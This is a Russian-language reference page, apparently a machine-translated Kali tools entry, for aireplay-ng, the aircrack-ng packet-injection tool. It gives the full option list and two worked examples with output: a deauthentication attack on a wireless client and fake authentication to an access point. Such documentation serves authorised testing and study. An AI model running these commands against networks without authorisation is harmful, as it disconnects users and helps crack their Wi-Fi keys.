Aireplay-ng

31 мая 2018 в Wireless Attacks

Описание Aireplay-ng

Aireplay-ng входит в пакет aircrack-ng и используется для ввода беспроводных кадров. Его основная роль - генерировать трафик для последующего использования в aircrack-ng для взлома ключей WEP и WPA-PSK. В Aireplay-ng есть много атак, которые могут идентифицировать беспроводных клиентов с целью захвата данных рукопожатия WPA, поддельных аутентификаций, интерактивного пакетного воспроизведения, ручного запроса ARP-запроса и повторной закачки ARP-запроса.

aireplay-ng - вводить пакеты в беспроводную сеть для генерации трафика


      root@kali:~# aireplay-ng --help
      
        Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
        http://www.aircrack-ng.org
      
        использование: aireplay-ng <опции> <интерфейс воспроизведения >
      
        Параметры фильтра:
      
            -b bssid  : MAC-адрес, точка доступа
            -d dmac   : MAC-адрес, пункт назначения
            -s smac   : MAC-адрес, источник
            -m len    : минимальная длина пакета
            -n len    : максимальная длина пакета
            -u type   : управление рамкой, поле типа
            -v subt   : управление рамкой, поле подтипа
            -t tods   : управление кадрами, бит DS
            -f fromds : управление кадрами, от DS бит
            -w iswep  : управление кадрами, бит WEP
            -D        : отключить обнаружение AP
      
        Параметры воспроизведения:
      
            -x nbpps  : количество пакетов в секунду
            -p fctrl  : установить управляющее слово кадра (hex)
            -a bssid  : установить MAC-адрес точки доступа 
            -c dmac   : установить MAC-адрес назначения 
            -h smac   : установить исходный MAC-адрес 
            -g value  : изменить размер буфера звонка (по умолчанию: 8)
            -F        : выбрать первый соответствующий пакет
      
            Параметры атаки Fakeauth:
      
            -e essid  : установить целевой AP SSID
            -o npckts : количество пакетов в пакет (0 = auto, default: 1)
            -q sec    : секунды между keep-alives
            -Q        : отправлять запросы на повторную связь
            -y prga   : keystream для общего ключа auth 
            -T n      : exit после повторной попытки аутентификации
      
            Параметры атаки Arp Replay:
      
            -j        : вставлять пакеты FromDS
      
            Параметры атаки фрагментации:
      
            -k IP     : установить IP-адрес назначения в фрагменты
            -l IP     : установить IP-адрес источника в фрагменты
      
            Параметры тестовой атаки:
      
            -B        : активирует тест битрейта
      
        Параметры источника:
      
            -i iface  : захватить пакеты из этого интерфейса
            -r file   : извлекать пакеты из этого файла pcap
        Различные варианты:
      
            -R                    : disable /dev/rtc usage
            --ignore-negative-one : если канал интерфейса не может быть определен,
                                    игнорировать несоответствие, необходимое для незагруженного cfg80211
      
        Режимы атаки (числа все еще могут использоваться):
      
            --deauth      count : деаутентификация 1 или всех станций        (-0)
            --fakeauth    delay : поддельная аутентификация с помощью AP     (-1)
            --interactive       : выбор интерактивной рамки                  (-2)
            --arpreplay         : стандартный повтор ARP-запроса             (-3)
            --chopchop          : дешифровать / chopchop WEP-пакет           (-4)
            --fragment          : генерирует действительный ключевой поток   (-5)
            --caffe-latte       : запросить клиента для новых IVs            (-6)
            --cfrag             : фрагменты против клиента                   (-7)
            --migmode           : атакует режим миграции WPA                 (-8)
            --test              : испытания инъекций и качество              (-9)
      
            --help              : Отображает этот экран использования
      

Примеры использования aireplay-ng

Атака деаутентификации

Запустите атаку деаутентификации ( -0 ), отправив 5 пакетов в точку беспроводного доступа ( -a 8C: 7F: 3B: 7E: 81: B6 ), чтобы отключить аутентификацию беспроводного клиента ( -c 00: 08: 22: B9: 41: A1 ) через интерфейс режима мониторинга wlan0mon.


      root @ kali: ~ # aireplay-ng -0 5 -a 8C: 7F: 3B: 7E: 81: B6 -c 00: 08: 22: B9: 41: A1 wlan0mon 
      12:41:56 Ожидание рамки маяка (BSSID : 8C: 7F: 3B: 7E: 81: B6) на канале 6 
      12:41:57 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ]
      12:41:58 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
      12:41:58 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
      12:41:59 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
      12:42:00 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ]
      

Поддельная аутентификация

Запустите фальшивую проверку подлинности и повторите проверку подлинности каждые 6000 секунд ( -1 6000 ) по точке доступа ( -a F0: F2: 49: 82: DF: 3B ) с данным ESSID ( -e FBI-Van-24 ), указав наш адрес mac ( -h 3c: 46: d8: 4e: ef: aa ), используя интерфейс режима мониторинга wlan0mon.


      root @ kali: ~ # aireplay-ng -1 6000 -e FBI-Van-24 -a F0: F2: 49: 82: DF: 3B -h 3c: 46: d8: 4e: ef: aa wlan0mon 
      12:49: 59 Ожидание кадра маяка (BSSID: F0: F2: 49: 82: DF: 3B) на канале 6 
      
      12:50:06 Отправка запроса на аутентификацию (открытая система)